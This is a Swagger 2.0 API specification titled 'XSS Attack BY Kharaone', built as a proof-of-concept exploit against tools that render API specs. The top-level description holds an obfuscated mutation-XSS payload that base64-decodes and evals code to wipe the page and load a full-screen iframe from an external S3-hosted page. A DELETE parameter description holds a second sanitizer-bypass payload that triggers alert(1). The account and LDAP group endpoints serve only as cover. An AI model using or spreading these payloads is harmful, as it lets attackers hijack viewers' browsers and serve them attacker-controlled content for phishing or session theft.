swagger: '2.0'
info:
  title: XSS Attack BY Kharaone
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7CnZhciBhPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lmcmFtZScpOwphLnNyYz0iaHR0cHM6Ly9zMy5ldS13ZXN0LTIuYW1hem9uYXdzLmNvbS9raGFyYW9uZS5jb20vcG9jLmh0bWwiOwphLmZyYW1lYm9yZGVyPSIwIjsKYS5zY3JvbGxpbmc9Im5vIjsKYS53aWR0aD0iMTAwJSI7CmEuaGVpZ2h0PSIxMDAlIjsKYS5pZD0ibXlGcmFtZSI7CmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7' onerror='eval(atob(this.id))'>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /Kharaone:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - Kharaone_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
    get:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findGroupsById
      summary: Finds groups by id
    post:
      parameters:
        - description: Id value to filter by
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You cannot create an LDAP group with a POST.  '
      operationId: createGroupById
      summary: Creates a new group by id
    put:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: You cannot change information for an LDAP group with a PUT.
      operationId: updateGroupById
      summary: Updates an existing group by id
